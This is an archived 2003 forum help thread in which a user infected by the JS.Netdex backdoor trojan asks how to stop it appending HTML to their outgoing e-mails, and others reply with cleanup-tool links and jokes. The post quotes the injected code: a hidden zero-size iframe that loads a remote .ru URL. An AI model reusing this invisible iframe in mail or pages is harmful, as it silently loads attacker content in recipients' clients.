Virus : Trojan House Backdoor JS.Netdex

Discussion in 'Computer Support' started by dannylco, Jul 10, 2003.

  1. dannylco

    dannylco Guest

    My computer was infected by JS.Netdex. And i have follow the
    instruction from symantec web site, clear all the registry key and the
    script file. However, when i send a new e-mail message to someone. The
    html code (same as below) will append to my new e-mail message. I
    already set the e-mail send as text format. How to i solve this
    problem?

    HTML code:
    ^^^^^^^^^^

    <HTML><HEAD>
    charset=3Dbig5"><BASE=20
    href=3Dfile://C:\WINDOWS\Cookies\>
    <META content=3D"MSHTML 6.00.2800.1170" name=3DGENERATOR></HEAD>
    <BODY bgColor=3D#ffffff>
    <DIV>&nbsp;</DIV><IFRAME marginWidth=3D0 marginHeight=3D0=20
    src=3D"http://www.two.com.ru/banner/?s=3Dn" frameBorder=3D0 width=3D0 =
    scrolling=3Dno=20
    height=3D0></IFRAME></BODY></HTML>

    dannylco, Jul 10, 2003

  2. dannylco

    Mara Guest

    http://security.kolla.de/index.php?lang=en&page=download
    http://www.lavasoftusa.com/support/download/

    "And stop sending e-mail in HTML."

    <snip>

    Mara, Jul 10, 2003

  3. dannylco

    slumpy Guest

    threw back my head and roared with laughter as Mara continued:
    He wasn't.
    " I already set the e-mail send as text format."
    :p

    Oh dear, let me guess....
    /hides head in bucket and hits send in error....

    slumpy, Jul 12, 2003